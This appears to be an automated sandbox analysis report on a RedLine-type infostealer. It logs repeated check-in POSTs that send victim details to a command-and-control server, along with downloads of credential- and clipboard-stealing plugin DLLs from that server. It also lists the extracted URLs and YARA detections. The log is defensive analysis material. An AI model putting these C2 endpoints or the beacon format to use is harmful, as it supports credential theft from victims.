                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 07 Feb 2023 22:07:01 GMTContent-Type: application/octet-streamContent-Length: 91136Last-Modified: Fri, 03 Feb 2023 17:19:21 GMTConnection: keep-aliveETag: "63dd4219-16400"Accept-Ranges: bytes
                              Source: Joe Sandbox ViewASN Name: TNNET-ASTNNetOyMainnetworkFI TNNET-ASTNNetOyMainnetworkFI
                              Source: Joe Sandbox ViewIP Address: 62.204.41.4 62.204.41.4
                              Source: mnolyk.exe, 0000000F.00000002.776777410.0000000000F78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/Plugins/clip64.dll
                              Source: mnolyk.exe, 0000000F.00000002.776777410.0000000000F78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/Plugins/cred64.dll
                              Source: mnolyk.exe, 0000000F.00000002.776777410.0000000000F78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/Plugins/cred64.dllZkoL
                              Source: mnolyk.exe, 0000000F.00000002.776777410.0000000000FC1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/index.php
                              Source: mnolyk.exe, 0000000F.00000002.776777410.0000000000FC1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/index.php$
                              Source: mnolyk.exe, 0000000F.00000002.776777410.0000000000FD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/index.php(
                              Source: mnolyk.exe, 0000000F.00000002.776777410.0000000000F9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/index.php3#
                              Source: mnolyk.exe, 0000000F.00000002.776777410.0000000000F78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/index.php5C
                              Source: mnolyk.exe, 0000000F.00000002.776777410.0000000000F9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/index.php79e5342a2
                              Source: mnolyk.exe, 0000000F.00000002.776777410.0000000000FC1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/index.php=
                              Source: mnolyk.exe, 0000000F.00000002.776777410.0000000000F9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/index.phpC#
                              Source: mnolyk.exe, 0000000F.00000002.776777410.0000000000F78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/index.phpEC:L
                              Source: mnolyk.exe, 0000000F.00000002.776777410.0000000000FD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/index.phpEE
                              Source: mnolyk.exe, 0000000F.00000002.776777410.0000000000F9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/index.phpI#
                              Source: mnolyk.exe, 0000000F.00000002.776777410.0000000000FC1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/index.phpQ
                              Source: mnolyk.exe, 0000000F.00000002.776777410.0000000000F78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/index.phpUC
                              Source: mnolyk.exe, 0000000F.00000002.776777410.0000000000F78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/index.phpYR
                              Source: mnolyk.exe, 0000000F.00000002.776777410.0000000000F78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/index.phpeC
                              Source: mnolyk.exe, 0000000F.00000002.776777410.0000000000F78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/index.phpft
                              Source: mnolyk.exe, 0000000F.00000002.776777410.0000000000F9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/index.phprundll32.exe
                              Source: mnolyk.exe, 0000000F.00000002.776777410.0000000000F78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/index.phpsoft
                              Source: mnolyk.exe, 0000000F.00000002.776777410.0000000000FC1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.4/Gol478Ns/index.phpx
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 14_2_012086E2 InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,14_2_012086E2
                              Source: global trafficHTTP traffic detected: GET /Gol478Ns/Plugins/cred64.dll HTTP/1.1Host: 62.204.41.4
                              Source: global trafficHTTP traffic detected: GET /Gol478Ns/Plugins/clip64.dll HTTP/1.1Host: 62.204.41.4
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Tue, 07 Feb 2023 22:07:00 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
                              Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                              Source: unknownHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                              Source: mnolyk.exe, 0000000F.00000002.776777410.0000000000F3A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                              System Summary

                              Source: 2.3.aPsf.exe.690000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                              Source: 2.2.aPsf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
